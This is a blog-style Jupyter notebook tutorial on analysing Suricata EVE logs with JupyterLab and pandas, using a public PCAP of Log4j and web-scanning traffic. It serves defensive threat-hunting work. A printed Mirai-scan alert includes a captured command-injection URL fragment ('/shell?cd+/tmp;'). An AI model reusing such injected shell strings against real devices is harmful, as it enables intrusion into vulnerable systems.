# Jupyter Playbooks for Suricata

Author: Markus Kont

## Introduction

Back in 2022, I did a Suricon presentation titled [Jupyter Playbooks for Suricata](https://youtu.be/hevTFubjlDQ). The goal of that presentation was to introduce JupyterLab to security practitioners who work with Suricata. Many people are familiar with exploring Suricata EVE output using established technology stacks such as Elastic stack, Splunk, etc. Yet might be unfamiliar with tools from data science world. Amazingly, a lot of people are still totally unfamiliar with EVE NSM data. It's 2023 and Suricata is still considered by many to be only a rule based IDS, even going so far that Suricata is often deployed in tandem with NSM logging tools as people believe Suricata is unable to fill the role.

To amend the situation, the presentation was focused around use-cases around exploring Suricata EVE JSON logs. It attempted to bridge a gap between threat hunting and data analysis, communities that have large overlap in what they do, yet remain quite far separated. It also attempted to highlight useful insights that can be extracted from EVE NSM data.

Original presentation resources can be found [here](https://github.com/StamusNetworks/suricata-analytics/blob/main/jupyter/Notebooks/Suricon2022Talk.ipynb). Since the presentation was about Jupyter notebooks, and Jupyter notebooks are by nature interactive, then it made no sense to me to format it as simple slideshow. In fact, notebook proved to be quite flexible presentation environment, and it turned the talk into one big tech demo. Perfect for a technical community conference. Input data was drawn from public sources, meaning anyone could run the notebook and repeat everything shown on stage.

That notebook was meant to be used as a resource. One that anyone could access and use as a reference for analyzing Suricata EVE logs. However, as anyone familiar with doing presentations knows, the challenge is not creating content. It's fitting what you have into the time window. A 45 minute tech talk really does not leave enough time to properly explain important concepts, especially if the audience is unfamiliar with talking points. Many ides were cut, others were explained quickly to move forward to interesting sections. Each pseudo-slide also needed to be readable, meaning no extensive *walls of text* as they would simply not fit the screen. The fact is, what works in a technical writing does not work for presenting. And vice versa.

Solution - write a extended notebook. More topics, more examples, and more context around each code cell. We will also section off the notebook into smaller blog posts for those not interested in interacting with notebook itself. Eventually it will formulate a series describing most important topics covered by the notebook. Why *most*? Because notebook can keep evolving over time, adding sections, improving examples, and maybe even reworking entire sections.

## About Jupyter notebooks

[Project Jupyter](https://jupyter.org/), born out of IPython Notebooks project, promotes open standards for interactive computing. Jupyter notebook is built on IPython kernel for running computations on interactive code inputted by the user, and outputs the results of those computations. In addition to code and output, user can also write markdown text to document each step. Hence the *notebook* moniker. Quick code to feedback loop makes Jupyter notebooks perfect for experimentation and documentation. It has become the de'facto tool for data scientists for this very reason. *Kernels* for many languages are supported. For example, [R](https://www.r-project.org/), [NodeJS](https://nodejs.org/en/), [Julia](https://julialang.org/), [Go](https://go.dev/) and [many more](https://github.com/jupyter/jupyter/wiki/Jupyter-kernels).

### Basic concepts

A notebook is organized into *cells*. Those cells are generally executed from top to bottom, but can also be evaluated individually by the user. A cell can contain either `code` or `markdown`, but not both. 

#### Code Cells

A code cell is similar to simple IDE, as it allows programmer to write code while also providing syntax highlighting and autocompletion. A code cell, unlike a typical script file, can be executed individually. In other words, cells *should* be evaluated sequentially but user is free to jump to earlier cell while retaining variables in memory that were created by latter cells. Whenever a code cell is executed, it displays return value of last line of code withing that cell. Simple variables can even be called with no additional printing or formatting code, as notebook automatically catches the return value. It even has built-in display formatting for data frames. More on that later.

#### Markdown Cells

Markdown cells are simply for formatting text. Unlike code cells, they do not display the source and output separately. Active markdown cell displays raw markdown source for editing while executing those cells formats them for reading. User can easily toggle between editing and reading, unlike many other editors that only display the source and require generating a fully formatted document for reading.

#### Kernel

A *kernel* lies at the core of code evaluation loop. Jupyter itself is written in Python and [IPython](https://ipython.org/) is the default kernel it was built around. However, users can install any number of kernels for different languages. Those kernels can vary in maturity and quality. Don't be surprised when a kernel for your favorite language is missing basic features such as syntax highlighting or code suggestions. A custom kernel simply might not support those features yet. Some kernels might even be missing basic language features.

Kernel is chosen when first creating a notebook and can not be changed later. Using multiple kernels in a single notebook is not currently possible. Nor is it possible to change a kernel of existing notebook.

#### JupyterLab

*IPython notebook files* that use `.ipynb` file extension are generally considered to be the *Jupyter Notebooks*. However, the original web interface created for interacting with them is nowadays also often referred to as *jupyter notebook*. Reason is likely to distinguish that interface from [JupyterLab](https://jupyterlab.readthedocs.io/en/stable/getting_started/overview.html), an advanced interface with IDE-like features. Such as tabs, splits, variable exploration, extensions, and more. Old interface simply focused on interacting with a single notebook. A notebook *file* can be edited with both interfaces. There are no compatibility differences. JupyterLab simply provides a more extensive (but also more complex) interface.

Lab instance can be launched with `jupyter lab` command while legacy interface can be executed with `jupyter notebook`. Nowadays most projects default to using lab over simple notebook editor, but many people might still prefer the simplicity of the old interface. Might be worth considering when only getting started.

### Setup

Jupyter core, lab IDE, and most extensions can simply be installed using normal python tooling. Keep in mind that `jupyter` and `jupyterlab` are separate packages with latter extending the former. They can be installed with any python package manager, such as pip, conda, mamba, etc.

```
pip install jupyter jupyterlab
```

#### Local user install

Global system install with `pip` is not recommended. I would suggest installing as regular user if not using a python virtual environment.

```
python3 -m pip install --user jupyter jupyterlab
```

Please keep in mind that this method shall place `jupyter` command into `~/.local/bin`. Don't be surprised when unable to find the jupyter command. Use full path or add this folder to PATH for convenience.

```
export PATH="$HOME/.local/bin:$PATH"
```

```
># which jupyter
/home/user/.local/bin/jupyter
```

Once installed, simply run the jupyter command. Then mind the output.

```
(general) ➜  suricata-analytics-1 git:(next-suricon-2022-10-28) ✗ jupyter lab
[I 2022-10-30 06:10:48.141 ServerApp] jupyterlab | extension was successfully linked.
[I 2022-10-30 06:10:48.150 ServerApp] nbclassic | extension was successfully linked.
[I 2022-10-30 06:10:48.170 LabApp] JupyterLab extension loaded from /home/markus/venvs/general/lib/python3.10/site-packages/jupyterlab
[I 2022-10-30 06:10:48.170 LabApp] JupyterLab application directory is /home/markus/venvs/general/share/jupyter/lab
[I 2022-10-30 06:10:48.173 ServerApp] jupyterlab | extension was successfully loaded.
[I 2022-10-30 06:10:48.177 ServerApp] nbclassic | extension was successfully loaded.
[I 2022-10-30 06:10:48.177 ServerApp] The port 8888 is already in use, trying another port.
[I 2022-10-30 06:10:48.178 ServerApp] Serving notebooks from local directory: /home/markus/Projects/SN/suricata-analytics-1
[I 2022-10-30 06:10:48.178 ServerApp] Jupyter Server 1.21.0 is running at:
[I 2022-10-30 06:10:48.178 ServerApp] http://localhost:8889/lab?token=b675c4daec9a6c2beb11b0a6cd38a314509ae62b1989b2e2
[I 2022-10-30 06:10:48.178 ServerApp]  or http://127.0.0.1:8889/lab?token=b675c4daec9a6c2beb11b0a6cd38a314509ae62b1989b2e2
[I 2022-10-30 06:10:48.178 ServerApp] Use Control-C to stop this server and shut down all kernels (twice to skip confirmation).
[C 2022-10-30 06:10:48.216 ServerApp]

    To access the server, open this file in a browser:
        file:///home/markus/.local/share/jupyter/runtime/jpserver-395207-open.html
    Or copy and paste one of these URLs:
        http://localhost:8889/lab?token=b675c4daec9a6c2beb11b0a6cd38a314509ae62b1989b2e2
     or http://127.0.0.1:8889/lab?token=b675c4daec9a6c2beb11b0a6cd38a314509ae62b1989b2e2
Opening in existing browser session.
```

Jupyter will by default launch the system default web browser. However, do pay special mind for the access information presented in this log output. Jupyter uses a randomly generated token to authenticate the session. This can of course be reconfigured in the configuration file to be a static token or even a password, but left unchanged requires following the connection link in order to properly authenticate. 

Do note also that example displays a port `8889` which is not the Jupyter default `8888`. Jupyter will detect if port is already in use, presumably by another instance of JupyterLab. When that happens, it simply increments the port number by one. Why would you want multiple instances of JupyterLab? Because you might want to use a different instances per project.

### Configuration

Jupyter supports extensive configuration. By default, the configuration file is missing and default values are implicitly used. To customize the setup, user will need to generate it.

```
jupyter notebook --generate-config
```

Default configuration file will be placed under `~/.jupyter/jupyter_notebook_config.py`. Notice that it's actually a python code file rather than plaintext configuration. This can enable very nice extensions to configuration. For example, a user might want to read configuration from environment variables instead which is useful for creating docker containers.

Customizing the configuration is not really needed for simple data exploration, however. Just something to keep in mind for advanced deployments.

### Code example

Jupyter is a interactive coding environment, so let's explore basic usage. Since the theme of this notebook is exploring EVE data, a good first exercise would be to download a PCAP file and parse it with Suricata. Results can then be analyzed in upcoming sections.

A great resource for PCAP files is [Malware Traffic Analysis](https://malware-traffic-analysis.net/), a site maintained by Suricata community member that hosts PCAP files for various malware infection scenarios. We start with a simple one that contains web scanning and [Log4j](https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance) CVE exploitation attempts. As any server administrator knows, website scanning is not really interesting traffic. It is inevitable when hosting any public services, scanning and exploitation attempts are fully automated by the malicious *spiders*. Think of it as malicious version of Google indexing your pages. All that can really be done against it is reducing the attack surface, keeping to best practices, and ensuring exposed services are fully up to date with latest patches. A exponentially more difficult task than those uninitiated would assume.

Nevertheless, that noise means abundance of data, making the PCAP perfect for displaying what Jupyter can do. We need to understand the general nature of the raw data, then separate relevant events from the noise.

In [1]:
URL = "https://malware-traffic-analysis.net/2022/01/03/2022-01-01-thru-03-server-activity-with-log4j-attempts.pcap.zip"

Archive can be downloaded with HTTP GET request using python `requests` library. 

In [2]:
import requests
response = requests.get(URL, stream=True)

Now we are able to conditionally check if download succeeded or not. If the response was HTTP 200 OK, then we stream the response payload into a local file handle. Along the way we also calculate some useful information, such as download size in kilobytes. If the response does not indicate a success, we simply report the failure. Note that failure reporting is done here mostly for demonstration. Most notebooks leave errors not handled, as subsequent code cells might depend on success on ones preceding it. Code evaluation is stopped when a cell *throws an exception*, prompting the user to figure out the issue. 

In [3]:
OUTPUT = "/tmp/malware-pcap.zip"

In [4]:
if response.status_code == 200:
    print("Download good, writing %d KBytes to %s" % 
          (int(response.headers.get("Content-length")) / 1024,
           OUTPUT))
    with open(OUTPUT, 'wb') as f:
        f.write(response.raw.read())
    print("Done")
else:
    print("Demo effect has kicked in")

Download good, writing 1254 KBytes to /tmp/malware-pcap.zip
Done


Once downloaded, we can simply use native python libraries to unzip the file. Scripting this rather than unzipping manually has several perks. For instance, threat research file archives that could contain actual malware samples are conventionally password protected, in order to protect unsuspecting users from compromising themselves. Standard password for these archives is `infected`. We can simply script this common password into unpacking call to save time.

Most difficult aspect about working with notebooks is dealing with data input and intermediate dumps. Reading a prepared CSV or JSON file is easy, but bundling it with notebook is not. Often I come back to a notebook that was made months ago, only to discover that it depends on data files that are no longer available. And nobody can remember any more how they were made. Or the notebook might point to hardcoded paths that only exist on analysts computer. It makes sense, since analyst wants to focus on the problem and not waste time dealing with how the data gets into the notebook. But that can make many notebooks unusable later.

It's a tough challenge and a balancing act. It is okay to make rough notebooks that are discarded after use. Data exploration is a fluid discipline, so properly documenting initial shots into the dark is not often worth the effort. This notebook, however, is not meant for that. Packaging how the data gets into the notebook can be just as important as the analysis.

In [5]:
from zipfile import ZipFile

In [6]:
with ZipFile(OUTPUT, "r") as zip:
    zip.extractall(path="/tmp", pwd="infected".encode("utf-8"))

Finally, we can verify that unpacked PCAP is in the filesystem by using *glob* search for finding all files with `.pcap` suffix. This allows us to build a variable that lists input files we can work with.

In [7]:
import glob

In [8]:
FILES = glob.glob("/tmp/*.pcap")
FILES

['/tmp/2022-01-01-thru-03-server-activity-with-log4j-attempts.pcap']

Note that we can simply display the value of `FILES` variable by calling it. No need for any `print` or string formatting statements, although those could make the output look nicer. Notebook calls builtin `display()` method for best effort output visualization. Method call is implicit when in global scope, meaning user does not need to import the method nor call it. But it would have to be called when displaying data from a function. Keep that in mind.

Currently the output is a simple python list, so notebook displays it as such. No fancy formatting. However, we will soon see how data tables are automatically made nice looking. It could also be copy-pasted into code block or even into other scripts or programs. Jupyter can and often is used for generating code that would otherwise be too tedious to write by hand.

### Invoking a shell command

Python code displayed in prior section is not complicated. But not even the most experienced programmers know every API by memory. Quite often we need to resort to scouring code documentation or internet forums to remind the most basic things. Writing custom code means handling things on fairly low level, even in *batteries included* language like Python. For a good reason. Using the `´requests` library expects user to have basic understanding about HTTP requests and responses, know how to access the response payload (should the request succeed), etc. The API does not and should not know anything about handling files on operating system level. That's a job for `os` package. You as the user have to know how to handle that.

So, would it not be nice to simply call that basic `wget` command you know by heart and use all the time? You can!

In [9]:
!wget -q -O /tmp/malware-pcap.zip.wget https://malware-traffic-analysis.net/2022/01/03/2022-01-01-thru-03-server-activity-with-log4j-attempts.pcap.zip

In [10]:
!ls -lah /tmp/malware-pcap*

-rw-r--r-- 1 jovyan users 1.3M Feb 23 09:04 /tmp/malware-pcap.zip
-rw-r--r-- 1 jovyan users 1.3M Jan  4  2022 /tmp/malware-pcap.zip.bashmagic
-rw-r--r-- 1 jovyan users 1.3M Jan  4  2022 /tmp/malware-pcap.zip.wget


Jupyter supports *magic* commands, either via built-in functions or calling shell commands. Exclamation mark as first symbol in the cell signifies a shell command. You can also use variables, though I imagine more complex logic will quickly become messy. Those magic commands are simply meant to be used for saving time on basics. Real power of a notebook still lies in all the options it gives the user for analyzing the data. And custom code enables that. Notebook users want to start analyzing data as fast as possible, so calling a familiar command instead of writing custom code can be a huge help.

In [11]:
OUTPUT_BASH_MAGIC = OUTPUT + ".bashmagic"

In [12]:
!wget -q -O $OUTPUT_BASH_MAGIC $URL

In [13]:
!ls -lah /tmp/malware-pcap*

-rw-r--r-- 1 jovyan users 1.3M Feb 23 09:04 /tmp/malware-pcap.zip
-rw-r--r-- 1 jovyan users 1.3M Jan  4  2022 /tmp/malware-pcap.zip.bashmagic
-rw-r--r-- 1 jovyan users 1.3M Jan  4  2022 /tmp/malware-pcap.zip.wget


#### Updating Suricata rules

Starting the code cell with percentage sign `%` invokes built-in functions. Again, it is a method for saving time on basic tasks. Jupyter has commands for loading python file content into a code cell, measuring execution time, installing python dependencies etc. Dependency install is especially useful in this notebook.

Working with Suricata eventually requires downloading and customizing rule files. Initial ruleset setup is quite easy, but maintaining it daily is a lot more difficult. Not every signature is meant to provide useful info in every environment. Alerting on a UNIX ping on a secure subnet that should only have Windows devices can be a red flag, but the same rule on a typical Linux server subnet is just a source of noise. A Linux system administrator would likely want to disable that rule, and ensure it remains disabled when ruleset is updated the next day. For a long time, this was out of scope for the main project and people had to resort to using legacy tools or custom scripts for downloading, updating, or modifying their rulesets.

[Suricata Update](https://suricata-update.readthedocs.io/en/latest/) is a command-line rule management tool developed and maintained by OISF. It comes bundled with Suricata, assuming it's built with all python tooling correctly enabled. But it can very easily installed individually, as just like Jupyter, it too is written in python. Jupyter builtin `%pip` command turns out to be very useful here, as we can ensure it's installed with minimal effort. Directly from the notebook. Makes it pretty handy for ensuring that notebook uses correct ruleset, without actually bundling the rules with notebook itself. File paths and software licenses can be a pain to deal with.

In [14]:
%pip install suricata-update

Note: you may need to restart the kernel to use updated packages.


Once suricata-update is installed, we can use it to enable rule sources, apply rule modification or disable overrides, and update our ruleset itself. For now, we simply enable a hunting ruleset that's likely to be too verbose on normal production installation. But it can highlight useful events that might go unnoticed with core Emerging Threats Open. For demonstration, the following cells:

* list available public sources to see what can be enabled;
* enable a new ruleset that's already defined in default public rule sources;
* call suricata-update itself to actually update the rule file;

Once called, `suricata-udpate` will download tarballs from each enabled source, apply conversion rules as needed, then concatenate the result into a single output rule file. If a rule file was downloaded recently, it might skipe the download entirely as normally this is done at most once a day.

In [15]:
!/home/jovyan/.local/bin/suricata-update list-sources

23/2/2023 -- 09:04:54 - <Info> -- Using data-directory /var/lib/suricata.
23/2/2023 -- 09:04:54 - <Info> -- Using Suricata configuration /etc/suricata/suricata.yaml
23/2/2023 -- 09:04:54 - <Info> -- Using /opt/suricata/share/suricata/rules for Suricata provided rules.
23/2/2023 -- 09:04:54 - <Info> -- Found Suricata version 7.0.0-beta1 at /opt/suricata/bin/suricata.
Name: et/open
  Vendor: Proofpoint
  Summary: Emerging Threats Open Ruleset
  License: MIT
Name: et/pro
  Vendor: Proofpoint
  Summary: Emerging Threats Pro Ruleset
  License: Commercial
  Replaces: et/open
  Parameters: secret-code
  Subscription: https://www.proofpoint.com/us/threat-insight/et-pro-ruleset
Name: oisf/trafficid
  Vendor: OISF
  Summary: Suricata Traffic ID ruleset
  License: MIT
Name: scwx/enhanced
  Vendor: Secureworks
  Summary: Secureworks suricata-enhanced ruleset
  License: Commercial
  Parameters: secret-code
  Subscription: https://www.secureworks.com/contact/ (Please reference CTU Countermeasures)
N

In [16]:
!/home/jovyan/.local/bin/suricata-update enable-source tgreen/hunting

23/2/2023 -- 09:04:54 - <Info> -- Using data-directory /var/lib/suricata.
23/2/2023 -- 09:04:54 - <Info> -- Using Suricata configuration /etc/suricata/suricata.yaml
23/2/2023 -- 09:04:54 - <Info> -- Using /opt/suricata/share/suricata/rules for Suricata provided rules.
23/2/2023 -- 09:04:54 - <Info> -- Found Suricata version 7.0.0-beta1 at /opt/suricata/bin/suricata.
23/2/2023 -- 09:04:54 - <Warning> -- The source tgreen/hunting is already enabled.
23/2/2023 -- 09:04:54 - <Info> -- Source tgreen/hunting enabled


In [17]:
!/home/jovyan/.local/bin/suricata-update

23/2/2023 -- 09:04:54 - <Info> -- Using data-directory /var/lib/suricata.
23/2/2023 -- 09:04:54 - <Info> -- Using Suricata configuration /etc/suricata/suricata.yaml
23/2/2023 -- 09:04:54 - <Info> -- Using /opt/suricata/share/suricata/rules for Suricata provided rules.
23/2/2023 -- 09:04:54 - <Info> -- Found Suricata version 7.0.0-beta1 at /opt/suricata/bin/suricata.
23/2/2023 -- 09:04:54 - <Info> -- Loading /etc/suricata/suricata.yaml
23/2/2023 -- 09:04:54 - <Info> -- Disabling rules for protocol pgsql
23/2/2023 -- 09:04:54 - <Info> -- Disabling rules for protocol modbus
23/2/2023 -- 09:04:54 - <Info> -- Disabling rules for protocol dnp3
23/2/2023 -- 09:04:54 - <Info> -- Disabling rules for protocol enip
23/2/2023 -- 09:04:54 - <Info> -- Last download less than 15 minutes ago. Not downloading https://raw.githubusercontent.com/travisbgreen/hunting-rules/master/hunting.rules.
23/2/2023 -- 09:04:54 - <Info> -- Last download less than 15 minutes ago. Not downloading https://rules.emergingt

#### Parsing the PCAP with Suricata

Having set up our rule file and downloaded a PCAP to analyze, we can now proceed with parsing it with suricata. Most people know that Suricata can read PCAP files offline with `-r` flag. Not many are aware that Suricata logging directory can be overridden using `-l` flag and that Suricata can be pointed toward a rule file with `-S` or `-s` flags. Capital `-S` means exclusive rule file, meaning all rule files configured in `suricata.yaml` are ignored. Lowercase `-s` adds that file to list of files already in the main configuration. 

We want predictable output for the notebook, so we choose exclusive load. We also clean any existing logs from the logging directory, so we ensure that it's fully recreated. Suricata would append logs to any existing PCAP files, meaning rerunning the code cell would create duplicate events.

In [18]:
LOGDIR = "/tmp/logs"

In [19]:
!rm -rf $LOGDIR && mkdir $LOGDIR && ls -lah $LOGDIR

total 0
drwxr-xr-x 1 jovyan users   0 Feb 23 09:04 .
drwxrwxrwt 1 root   root  264 Feb 23 09:04 ..


In [20]:
LOG4J_PCAP = FILES[0]

In [21]:
!suricata -S /var/lib/suricata/rules/suricata.rules -l $LOGDIR -r $LOG4J_PCAP -v

23/2/2023 -- 09:04:58 - <Notice> - This is Suricata version 7.0.0-beta1 RELEASE running in USER mode
23/2/2023 -- 09:04:58 - <Info> - CPUs/cores online: 12
23/2/2023 -- 09:04:58 - <Info> - fast output device (regular) initialized: fast.log
23/2/2023 -- 09:04:58 - <Info> - eve-log output device (regular) initialized: eve.json
23/2/2023 -- 09:04:58 - <Info> - stats output device (regular) initialized: stats.log
23/2/2023 -- 09:05:02 - <Info> - 1 rule files processed. 33567 rules successfully loaded, 0 rules failed
23/2/2023 -- 09:05:02 - <Info> - Threshold config parsed: 0 rule(s) found
23/2/2023 -- 09:05:02 - <Info> - 33570 signatures processed. 1183 are IP-only rules, 5314 are inspecting packet payload, 26869 inspect application layer, 108 are decoder event only
23/2/2023 -- 09:05:07 - <Notice> - Threads created -> RX: 1 W: 12 FM: 1 FR: 1   Engine started.
23/2/2023 -- 09:05:07 - <Info> - Starting file run for /tmp/2022-01-01-thru-03-server-activity-with-log4j-attempts.pcap
23/2/2023 -

This should result in some interesting data to analyze in `/tmp/logs/eve.json`. Before we introduce data scientists tooling, let's just extract a single high severity alert to see how a typical EVE event looks like. As you can see, it's a highly nested JSON event with a lot of extra context. Very useful for providing analyst with as much data as possible. But it can be quite daunting to explore, as a single event can already fill entire screen but a production network can produce millions.

#### Quick look into the first event

Once parsed, it’s time to look into a sample EVE event. Alert is a good first pick, since it also includes info from other event types. And also to verify that the ruleset load worked correctly. A lot of things can go wrong when loading rules. A variable can be missing, keyword might be unsupported, or home networks might be incorrectly set up. Former issues would cause errors while loading rules, and problematic rules would be skipped. Last issue, misconfigured home network, is an oversight and rules would simply not trigger. However, those issues are not fatal. Suricata would still start up and produce NSM events, even without a fully functioning ruleset.

Suricata EVE JSON file is really a newline-delimited JSON (NDJSON), meaning we cannot parse the full file as JSON. We need to do it line by line. Following example code iterates lines until the first alert event is found.

In [22]:
import json

In [23]:
with open("/tmp/logs/eve.json", "r") as handle:
    handle.readline()
    for line in handle:
        eve = json.loads(line)
        if eve.get("event_type", "") == "alert" and eve.get("alert", {}).get("severity") == 1:
            print(json.dumps(eve, indent=2))
            break

{
  "timestamp": "2022-01-01T19:05:52.130715+0000",
  "flow_id": 2151512145691769,
  "pcap_cnt": 10350,
  "event_type": "alert",
  "src_ip": "186.220.97.233",
  "src_port": 4873,
  "dest_ip": "198.71.247.91",
  "dest_port": 80,
  "proto": "TCP",
  "pkt_src": "wire/pcap",
  "tx_id": 0,
  "alert": {
    "action": "allowed",
    "gid": 1,
    "signature_id": 2029022,
    "rev": 3,
    "signature": "ET SCAN Mirai Variant User-Agent (Inbound)",
    "category": "Attempted Administrator Privilege Gain",
    "severity": 1,
    "metadata": {
      "affected_product": [
        "Linux"
      ],
      "attack_target": [
        "IoT"
      ],
      "created_at": [
        "2019_11_21"
      ],
      "deployment": [
        "Perimeter"
      ],
      "former_category": [
        "SCAN"
      ],
      "signature_severity": [
        "Minor"
      ],
      "updated_at": [
        "2020_10_29"
      ]
    }
  },
  "http": {
    "hostname": "127.0.0.1",
    "http_port": 80,
    "url": "/shell?cd+/tmp;

### Dataframes and Pandas

JSON is great for building applications and for security analytics. It is structured and most modern no-sql databases default to using it. Nowadays, security analysts are used to reading it. Data scientists and data engineers, however, working with tabular row-column data. Most data mining and machine learning algorithms work on data vectors or matrices, with a matrix essentially just being a vector of vectors. For statistical analysis, those vectors usually contain floating point numbers - some kind of numeric measurements. Each vector would make up a column of data within the matrix, and complex calculations are carried out on them. 

Sometimes multiple columns are combined to transform raw data into more meaningful context. For example, Suricata measures request and response bytes separately, and analyst might want to sum up those columns. Other times a vector would be scaled or normalized, as measurements might be on different scales and would thus not be directly comparable. For example, defining a generic threshold is very difficult as traffic scale and patterns differ greatly between organizations.

Column of data might not be numeric measurements, but rather textual values, booleans, timestamps, categories etc. This is usually the case with NSM data. A classical matrix stores only one *type* of data, usually numbers. A *dataframe* is basically a matrix where each column can be of different type. [Pandas](https://pandas.pydata.org/) is a data analysis and manipulation library that brings dataframes to Python language.

Getting started with dataframes is quite simple. The challenge is changing the mindset. Coders experienced in imperative languages might need to relearn what they already know. Statistical analysis is centered around vectors, rather than individual elements. Furthermore, API-s are often declarative and follow functional programming paradigms. Basically, you need to drop the *for loop* and learn how to *apply* functions instead.

Reason is performance. CPU-s are really efficient at crunching numbers and SIMD instructions speed up calculations by orders of magnitude. Even the smartest code has a hard time competing with that. Data science libraries in high-level languages such as Python often function as interfaces. They give the user an extensive API that's intuitive to use, yet actually defer the calculations to low level code written in C or C++ that are able to leverage optimized CPU instructions or even GPUs. In other words, passing a vector of data means it might be handled by efficient machine code, whereas looping over items in Python means they will be always evaluated by Python. A language notorious for being slow.

In the case of Suricata data, we're mostly working with textual values that would firstly need to be converted into numerical measurements before such gains could be made. Hence, we likely won't see a huge performance increase doing things the *pandas way* rather than *python way*. In fact, sometimes it will be faster to just convert data between python objects and native python data structures, especially when fast random lookup is required (lists are really bad at that). This is a challenge when combining NSM data with data science tools. Concessions need to be made on both sides. Data science tools are not better nor worse than tech stacks that are well established in security. They simply open new possibilities.

Benefits of choosing pandas over native python are:

* Pandas implements a ton of useful methods for working with and filtering data;
* Pandas code can be much more concise that imperative logic in python, often achieving in few lines that would otherwise require complex functions;
* Jupyter has native display and visualization support for pandas dataframes, making visual exploration much easier;

Choose raw python objects over dataframes when:
* complex conversion needs to be made that is not readily provided in Pandas;
* fast random access is needed;

In [24]:
%pip install pandas

Note: you may need to restart the kernel to use updated packages.


In [25]:
import pandas as pd

In [26]:
pd.options.display.html.use_mathjax = False

In [27]:
pd.DataFrame([{"src_ip": "1.1.1.1", "flow_id": 123}, {"src_ip": "2.2.2.2", "flow_id": 124}])

,src_ip,flow_id
0,1.1.1.1,123
1,2.2.2.2,124


#### Nested JSON and Pandas

As anyone familiar with Suricata EVE format knows, it can be challenging to work with thanks to nested structure and sheer amount of fields. Suricata can log well over 1000 distinct JSON key-value pairs, omitting any that has been disabled in configuration or simply cannot be parsed from a particular flow. For example, a TLS 1.3 connection will for now most likely display a SNI (Server Name Indication) but will not have any certificate fields, as latter are simply not visible in plaintext network view. Sometimes a field only appears in handful of events, making it easy to overlook. Figuring out what is available to work on is a challenge.

Pandas provides a useful method `json_normalize` for normalizing nested JSON fields into dataframe. Resulting columns use dot notation to signify nested object, similar to how Elasticsearch does it. For example, `sni` key is part of `tls` section and would be accessible from column `tls.sni`. Missing values are noted as `np.nan`, or *not a number*, which is a statistical analysis convention. As mentioned, statistics is where pandas and underlying *numpy* libraries originated from. A measurement could simply be missing due to bad instrumentation, or it might be result of some algorithm that does not provide meaningful output is some scenarios. For example, dividing by zero is not allowed but nevertheless happens very easily in statistics. When trying to find a ratio between two measurements and second counter is 0, the only possible result is `NaN` as result `0` would be mathematically incorrect.

*Not a number* is actually a special floating point value and a perfectly legal data type for vector computing. For Suricata, however, it simply means a missing value and likely has nothing to do with numeric measurements. Think of it as `null` or `None` value.

Note that we still need some regular python code to parse individual EVE messages, as built-in pandas `read_json` would assume a full JSON structure rather than *newline delimited* JSON (NDJSON) log. Also note that this method reads all logs into memory and all further processing is also done there as well. Do not expect it to scale over gigabytes of data, unless of course you have access to a lot of RAM on single machine. It's meant for limited data exploration, quick prototyping, etc. Big data analytics when unable to fit into local memory requires supporting infrastructure.

In [28]:
with open("/tmp/logs/eve.json", "r") as handle:
    DF = pd.json_normalize([
        json.loads(line) for line in handle
    ])
DF

,timestamp,flow_id,pcap_cnt,event_type,src_ip,src_port,dest_ip,dest_port,proto,pkt_src,...,stats.app_layer.error.nfs_udp.internal,stats.app_layer.error.krb5_udp.alloc,stats.app_layer.error.krb5_udp.parser,stats.app_layer.error.krb5_udp.internal,stats.app_layer.expectations,stats.http.memuse,stats.http.memcap,stats.ftp.memuse,stats.ftp.memcap,stats.file_store.open_files
0,2022-01-01T00:05:51.487413+0000,2.093424e+15,50.0,sip,193.46.255.60,5103.0,198.71.247.91,5060.0,UDP,wire/pcap,...,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN
1,2022-01-01T00:48:30.704116+0000,1.898256e+15,418.0,sip,165.227.105.220,5073.0,198.71.247.91,5060.0,UDP,wire/pcap,...,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN
2,2022-01-01T00:00:13.076985+0000,7.894928e+14,NaN,flow,34.207.117.173,NaN,198.71.247.91,NaN,ICMP,NaN,...,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN
3,2022-01-01T00:00:13.076985+0000,5.891015e+13,NaN,flow,52.87.198.117,NaN,198.71.247.91,NaN,ICMP,NaN,...,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN
4,2022-01-01T00:01:49.092097+0000,1.521457e+15,18.0,dns,209.141.58.15,35550.0,198.71.247.91,53.0,UDP,wire/pcap,...,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN
...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...
25881,2022-01-01T00:00:13.076985+0000,9.586926e+14,NaN,flow,2.56.57.136,49464.0,198.71.247.91,3846.0,TCP,NaN,...,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN
25882,2022-01-01T00:00:13.076985+0000,1.031022e+14,NaN,flow,104.167.223.204,6075.0,198.71.247.91,5080.0,UDP,NaN,...,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN
25883,2022-01-01T00:00:13.076985+0000,2.259705e+13,NaN,flow,34.86.35.2,62892.0,198.71.247.91,5900.0,TCP,NaN,...,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN
25884,2022-01-01T00:00:13.076985+0000,1.992429e+15,NaN,flow,45.134.26.235,58276.0,198.71.247.91,12343.0,TCP,NaN,...,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN


#### Quick overview of columns

Before proceeding analyzing the data, we need a initial overview of what we can work with. The most simple measurement is simply understanding the number of rows and columns in the set.

In [29]:
DF.shape

(25886, 547)

In [30]:
print("dataframe has %d rows and %d columns" % DF.shape)

dataframe has 25886 rows and 547 columns


As mentioned before, understanding the available fields is particularly important for EVE data. This info can be accessed directly from the dataframe object. The reader might also observe significant noise in these values, as the simple EVE log we loaded most likely contains `stats` events. These fields provide a lot of statistics from Suricata engine and are really useful for finding performance problems. However, they don't contribute much to threat hunting and simply overshadow data fields.

To deal with this, we can write simple python to filter them out and provide a much cleaner view of the data.

In [31]:
COLS_STATS = [c for c in list(DF.columns.values) if c.startswith("stats")]
len(COLS_STATS)

431

In [32]:
print("%d stats cols from total %d" % (len(COLS_STATS), len(DF.columns.values)))

431 stats cols from total 547


In [33]:
COLS_DATA = [c for c in list(DF.columns.values) if not c.startswith("stats")]

In [34]:
print("%d data columns" % len(COLS_DATA))

116 data columns


In [35]:
DF[COLS_DATA]

